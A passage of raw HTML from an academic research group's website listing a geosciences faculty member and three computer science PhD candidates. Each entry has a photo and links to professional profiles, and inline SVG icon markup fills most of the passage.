</div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c67\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c67 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c140\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c140 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c141-outer\">\n            <div data-colibri-id=\"182-c141\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c141 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-862 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c68\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c68 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-854 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\" class=\"wp-image-1659 style-854-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-902 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-855 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-849 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-901 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-853 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-856 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-852 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-857 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 